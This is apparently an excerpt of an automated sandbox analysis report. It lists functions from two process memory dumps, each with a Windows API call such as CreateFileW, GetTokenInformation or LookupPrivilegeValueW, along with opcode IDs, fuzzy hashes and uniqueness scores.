                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 937cd98087179835be847d5a5a14855364dbf8b24676de975352163858d81b3d
                                                        • Instruction ID: bf27b1498b566de9b50afd6ff93adcd148f70d8f6ca59a77a71b24c54db29358
                                                        • Opcode Fuzzy Hash: 937cd98087179835be847d5a5a14855364dbf8b24676de975352163858d81b3d
                                                        • Instruction Fuzzy Hash: 70314A7650E3C09FEB138B759C65692BFB4AF03210F0E84DBD884CF1A3D6259809D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: f64b0bc5c50cc1ce7d882b32afd1d653d942f47fecf97eb4a6e204a77f2e0ed0
                                                        • Instruction ID: 75344fb05ad2a4cc8e284ecd36dec1ec4d7b90dca7e1b034e91adb2cf87d21ae
                                                        • Opcode Fuzzy Hash: f64b0bc5c50cc1ce7d882b32afd1d653d942f47fecf97eb4a6e204a77f2e0ed0
                                                        • Instruction Fuzzy Hash: C6316271509380AFEB22CF65DC85F56BFF8EF05210F09849EE9859B292D375A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 73eea6d2b5466730ea7f7733356202a27d52114b824362eef84d251d116b3f49
                                                        • Instruction ID: a2e52a2e50c00ea0507844c123065772524ffbece3df022c8a057bf0b924a391
                                                        • Opcode Fuzzy Hash: 73eea6d2b5466730ea7f7733356202a27d52114b824362eef84d251d116b3f49
                                                        • Instruction Fuzzy Hash: 4A3198B1509380AFE712CB25DC45B96BFE8DF06214F0884AAE984DF293D375A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: ee4407a00ea301c4420ebb10ed31dbce7f22d26441ed4c65b997cb9ddfa96b4d
                                                        • Instruction ID: a62f6478d027a05687d6b03ec8421d7a30dce938dd6280d023e0634823caadb1
                                                        • Opcode Fuzzy Hash: ee4407a00ea301c4420ebb10ed31dbce7f22d26441ed4c65b997cb9ddfa96b4d
                                                        • Instruction Fuzzy Hash: 1A21E4B2509380AFE712CF20DC45B96BFB8EF06320F0984DBE984DB193D265A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDBDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: ba994afce085926b7c50a1b2df0d8e837d1c39eddf3119977ede64d0b7404485
                                                        • Instruction ID: fd863bea5fa5e5c47773181fd0e5c3ba686a3e793e45a09e7848287dae731890
                                                        • Opcode Fuzzy Hash: ba994afce085926b7c50a1b2df0d8e837d1c39eddf3119977ede64d0b7404485
                                                        • Instruction Fuzzy Hash: FD31C372509384AFE722CB60DC45F96BFB8EF06210F0985DBF984CB193D224A909C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 90b10fe1c8c4882085d3a3797b0264d43419bceb1041c730e148e84a7db58572
                                                        • Instruction ID: c05bb6747d3e95190b4358f5dd81a28d9134e8844e5a6830298c930400230382
                                                        • Opcode Fuzzy Hash: 90b10fe1c8c4882085d3a3797b0264d43419bceb1041c730e148e84a7db58572
                                                        • Instruction Fuzzy Hash: E6316FB550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 58c411642f598faa25c272fa233ee32ac6b7216fbe0042a3e110d92ec9e46dfa
                                                        • Instruction ID: 8a056873960150b6166067811986c3e18ab5400b7d356dc697d9579bd77e9576
                                                        • Opcode Fuzzy Hash: 58c411642f598faa25c272fa233ee32ac6b7216fbe0042a3e110d92ec9e46dfa
                                                        • Instruction Fuzzy Hash: 0C21B171509380EFE722CB15CC44FA6BFA8EF06320F09849AE945CB152D664A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 7f542d62339a28aa6724a479d5445ded9bd847a9786fdb8c7140f787625808dd
                                                        • Instruction ID: ec3b7f85f33f9af0fb4e74261ec56c62c5ff23c314e32ae1136fa6ce004fd6dd
                                                        • Opcode Fuzzy Hash: 7f542d62339a28aa6724a479d5445ded9bd847a9786fdb8c7140f787625808dd
                                                        • Instruction Fuzzy Hash: D421FCB6508780AFE712CB159C45FA3BFA8EF46720F0981DBF9848B193D224A905C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01EDA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 252c03b13e4e41881cfcd1092ee2844c8e32e321c972f717e732fc8fc2cfab76
                                                        • Instruction ID: 691a7551989e806bb72d5d0828618da90fd48be4f3b867defd595b296e3101ae
                                                        • Opcode Fuzzy Hash: 252c03b13e4e41881cfcd1092ee2844c8e32e321c972f717e732fc8fc2cfab76
                                                        • Instruction Fuzzy Hash: D721A47190D3C06FD3128B258C55B66BFB4EF47620F1981DBE884CF293D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 4eaf3bb5a8bc07a8f2eaa127562171ad83277eeea2a514cc1182ea492b353957
                                                        • Instruction ID: 86a4b581a1b526d31488f89f5def69629d5df2ae9d19e593eef58ea887f5bf61
                                                        • Opcode Fuzzy Hash: 4eaf3bb5a8bc07a8f2eaa127562171ad83277eeea2a514cc1182ea492b353957
                                                        • Instruction Fuzzy Hash: CF217F7650E3C0AFD3128B359C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5f292c7852365e221037abc71f24a5490b88fd02d4febfc2d4bc8141a2b19f5a
                                                        • Instruction ID: 12e91ca8ddc8e8aa639bf4b0576e8a1c122dc64fe9247248792ae930beadb1a9
                                                        • Opcode Fuzzy Hash: 5f292c7852365e221037abc71f24a5490b88fd02d4febfc2d4bc8141a2b19f5a
                                                        • Instruction Fuzzy Hash: E6219D71500704EFEB21DF65DC85F66FBE8EF08650F04846AE9899B292D771E904CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: ffc446e1be7818169ac95170ee686c157835edeb2545b97701379719e38d8a25
                                                        • Instruction ID: 4a9dc8bfc69d9355b708641d90087c08a394c367fb86b180f5f54ba9425a60a7
                                                        • Opcode Fuzzy Hash: ffc446e1be7818169ac95170ee686c157835edeb2545b97701379719e38d8a25
                                                        • Instruction Fuzzy Hash: B3219272409380AFE722CF61DC45F56BFB8EF06314F09859BE9849B153C265A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01EDA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 6c528b3ab611ce00e8af64309a6fb74767a3e4d0e1408269358fbf7ccc3eb595
                                                        • Instruction ID: fda387e74e8c407863e2fe8ae60281f2d974b170756be05b9c1352091f9eb86a
                                                        • Opcode Fuzzy Hash: 6c528b3ab611ce00e8af64309a6fb74767a3e4d0e1408269358fbf7ccc3eb595
                                                        • Instruction Fuzzy Hash: D721957550D780AFD3138B259C51B62BFB8EF87610F0981DBE8848B653D224A919C7B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: d78f6d23811973b612a5fa90ea5f50f35baa846b6f3e1d5badbd1c94f1a63810
                                                        • Instruction ID: 619e7adc8ff73e9549a4d6c76c85948f8a8bec0493e7137d9c01bc925a00cf0d
                                                        • Opcode Fuzzy Hash: d78f6d23811973b612a5fa90ea5f50f35baa846b6f3e1d5badbd1c94f1a63810
                                                        • Instruction Fuzzy Hash: F2219DB1600300AFEB20DB25DC85BA6FBD8EF04210F04846AE848DB282D775E904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDBDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: cf5ec80a5f55dfe70e3047315f94c849605fdc19554fc6fc2ca5cad227d9c3c6
                                                        • Instruction ID: deb3c593a4d0d93ae5a12b697030ad388bf263faebcc030e3f59766f9d9e5fbf
                                                        • Opcode Fuzzy Hash: cf5ec80a5f55dfe70e3047315f94c849605fdc19554fc6fc2ca5cad227d9c3c6
                                                        • Instruction Fuzzy Hash: 98119D72500304EFEB21CF65DC85FAAFBA8EF05320F14856AFD45DA141E670A9058BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 710aa844e1402637fb5924ce63ddf4a3da5f02368018f0fd0ff2924a3af1679b
                                                        • Instruction ID: c8779427f155bd1356b91cf117ef083b8eb99b4915ff195f1c2bf11eb84957b9
                                                        • Opcode Fuzzy Hash: 710aa844e1402637fb5924ce63ddf4a3da5f02368018f0fd0ff2924a3af1679b
                                                        • Instruction Fuzzy Hash: D8219F725083809FEB21CF25DC45B96FFF4EF06220F0884AAED898B562D235A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: d20de120b19dd11154a2e1741e7d5f40bcdb059e25e362ee306b953369060857
                                                        • Instruction ID: 8cf0771cffcad5124d394c8b431b61ab52e5f6d49ccb0e8e3b56b068eb4c3d44
                                                        • Opcode Fuzzy Hash: d20de120b19dd11154a2e1741e7d5f40bcdb059e25e362ee306b953369060857
                                                        • Instruction Fuzzy Hash: BB215B7150D3C09FDB12CB25DC55B92BFB4AF03224F0D84DAE888CF293D2659808DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 45598a4a9aad797d21ebe0b0d2287944e8d9c67709ffe07e99ad5dfeafb90f31
                                                        • Instruction ID: 0f4af1c636d9db56a88c41e3990e05ef239e552cc48ffb714a0235561602a019
                                                        • Opcode Fuzzy Hash: 45598a4a9aad797d21ebe0b0d2287944e8d9c67709ffe07e99ad5dfeafb90f31
                                                        • Instruction Fuzzy Hash: 19118175600300EFEB21DF15DC85FAAFBE8EF45760F14846AED05CB241E674E9058A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01EDAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 7d4cf44d83b2350cae4ed0e97d7890813699a98bc4dd3bace8ae8fae182383af
                                                        • Instruction ID: b12b950bcba816d025c16b6f1e7eefdc006145b7552e515d26f34f5684446fce
                                                        • Opcode Fuzzy Hash: 7d4cf44d83b2350cae4ed0e97d7890813699a98bc4dd3bace8ae8fae182383af
                                                        • Instruction Fuzzy Hash: 932172716053809FE722CF29DC44B56BFE8EF46214F0885AAED49CB252D275E805CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01EDBB2F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 9e8113dd382722624c98cbc988ac0a89dbe57090f478265b40e136e2c35f1bfe
                                                        • Instruction ID: 971837d6ef75262b0e6d5fc79f7615fc3dea171e16468d0048568ed2b9cd4655
                                                        • Opcode Fuzzy Hash: 9e8113dd382722624c98cbc988ac0a89dbe57090f478265b40e136e2c35f1bfe
                                                        • Instruction Fuzzy Hash: 7C21A1725097C09FEB128B25DC55B96BFE4EF07220F0984DBED858F263D234A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 0a2120a683696544425bacac505b87a071fb803a09dec5eda9bb5cc92c8f7674
                                                        • Instruction ID: 3ce4aacdde491a4e5f048772a35c56a59efaabf3b51f401ed3bc1fe969dcd700
                                                        • Opcode Fuzzy Hash: 0a2120a683696544425bacac505b87a071fb803a09dec5eda9bb5cc92c8f7674
                                                        • Instruction Fuzzy Hash: AD216D6140D3C4AFD7138B259C54A62BFB4EF57620F0980DBD8848F2A3D2696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 0579c9b7e1a0c1528a0397c01959b7cdf9bc0ff882f37953774da14565ee9d05
                                                        • Instruction ID: e38784c69a000fac33ac4b91f63625f183b6aacbbff9ff41307606fdcb4e2c1b
                                                        • Opcode Fuzzy Hash: 0579c9b7e1a0c1528a0397c01959b7cdf9bc0ff882f37953774da14565ee9d05
                                                        • Instruction Fuzzy Hash: 5811C172500300EFEB21DF55DC85FAAFBA8EF44720F1484AAFD498B281D670A9458BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1866e0cd7f998200f2957f007d8b5453cb4fcf7dc3ac797d22cb8a232b15541c
                                                        • Instruction ID: ca068430d71095d1813f6d6f4834c75426a7602b2861b21b43ef2e61a20b967c
                                                        • Opcode Fuzzy Hash: 1866e0cd7f998200f2957f007d8b5453cb4fcf7dc3ac797d22cb8a232b15541c
                                                        • Instruction Fuzzy Hash: F011CE72500300EFFB21CF51DC85FA6FBE8EF14720F04856AED499A241D671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01EDBA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 6f2e2ba851f3c7a5c80ec91e1dc7eb11cd17a15013c3f05f58d6c09b9e9c4087
                                                        • Instruction ID: c45e96cb53cd0b7ae6fedd8b81855262707cf58dff901d6b02723fb7f00c6b76
                                                        • Opcode Fuzzy Hash: 6f2e2ba851f3c7a5c80ec91e1dc7eb11cd17a15013c3f05f58d6c09b9e9c4087
                                                        • Instruction Fuzzy Hash: 4B11AF72508380AFDB22CF65DC44B52FFF4EF06210F09849EE9898B662D375E419DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 93b4b7a8383574ae4dfc28aa7d79b405b6af885203f8bdc6c668496dd7ed77dc
                                                        • Instruction ID: eeb0009cb05389eca71dd145f7856e35076859776ad5190648272a932f8979b5
                                                        • Opcode Fuzzy Hash: 93b4b7a8383574ae4dfc28aa7d79b405b6af885203f8bdc6c668496dd7ed77dc
                                                        • Instruction Fuzzy Hash: D81191715093849FDB118F25DC45B96FFE4EF06220F0984EEED898B252D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: c583eaa850d2204bcda73720863bd6cb5c862422c98da787c383f6e092956890
                                                        • Instruction ID: ce2255efab384e7423aa84e8337901f1202612224c34a25392ff473b230a2529
                                                        • Opcode Fuzzy Hash: c583eaa850d2204bcda73720863bd6cb5c862422c98da787c383f6e092956890
                                                        • Instruction Fuzzy Hash: 74118F715093C09FE7128B25DC54B66BFB4DF47614F0880DAEDC44F253D265A908DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 00f510df5682c9957a9d1a1e7bd54bedab7f7782d81490be5f223478f7f6d352
                                                        • Instruction ID: d7ace92ba1764da6977c423cb47d6dd06f7c711adcbe2fd62807ec61b5ffb8b0
                                                        • Opcode Fuzzy Hash: 00f510df5682c9957a9d1a1e7bd54bedab7f7782d81490be5f223478f7f6d352
                                                        • Instruction Fuzzy Hash: 3311C2765093C09FDB128B25DC95B52FFB4EF42224F0880DBED858B663D275A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 55c574726ca1b191de6daa8094f0b3134a6930ac40efb4492c730e81e5bd4f80
                                                        • Instruction ID: 98774117760442b89312402ffb3cfbcc00f35c982fe28507261fc564c846f6ff
                                                        • Opcode Fuzzy Hash: 55c574726ca1b191de6daa8094f0b3134a6930ac40efb4492c730e81e5bd4f80
                                                        • Instruction Fuzzy Hash: 3D119D719093C09FEB228B25DC55B92BFA4EF07324F0980DAD9844B263D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01EDAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: f1313e9fd22477c5e3db5e92f8f921e3f28bed5f11c202a07e06566e93640afc
                                                        • Instruction ID: c2b6aaf171b7930cad3d767f0dd235c6e70d49123241d57ad46ea7c71a692cf8
                                                        • Opcode Fuzzy Hash: f1313e9fd22477c5e3db5e92f8f921e3f28bed5f11c202a07e06566e93640afc
                                                        • Instruction Fuzzy Hash: 98115EB26003009FEB20DF29DC85B9AFBD8EB45625F08C57AED4ACB642D674E505CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01EDAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: a2f014645a4b0286434a2bec61b266a0088ed8191dcc45cff2f74aa77ce8ad55
                                                        • Instruction ID: d0c44c501581867387b056fc1efbcda41ba8ea6976af018fd8a93fe637db8299
                                                        • Opcode Fuzzy Hash: a2f014645a4b0286434a2bec61b266a0088ed8191dcc45cff2f74aa77ce8ad55
